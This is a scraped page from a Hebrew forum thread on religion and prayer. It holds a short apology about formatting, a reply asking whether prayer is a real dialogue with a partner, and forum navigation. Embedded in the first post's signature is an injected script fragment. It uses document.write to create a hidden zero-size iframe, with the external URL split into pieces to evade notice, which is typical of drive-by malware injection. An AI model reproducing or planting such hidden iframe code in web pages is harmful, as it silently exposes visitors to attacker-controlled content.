התנצלות: עקב בעיות בהדגשה נאלצתי לשחק עם הכתוב ולכן הטקסט בכמה מקומות היה טעון תיקון שוב. מקוה שהפעם זה בסדר. וראו שהסוף מודגש על אפי ועל חמתי...

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 02/10/2015 12:54:51

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 13:18 לינק ישיר 

מיימוני

לא הצלחתי להבין (את מה שכנראה הייתי אמור להבין מבין השורות), כשאתה מדבר על חוויה שמובילה לדיאלוג מה לדעתך קורה עם הפרטנר, הוא באמת מקשיב/נענה וכו?
או שהדיאולוג מתנהל לו רק בינך לבין עצמך?

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > תפילה על רגל אחת
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 3 4 5 6 לדף הבא סך הכל 6 דפים.

bholext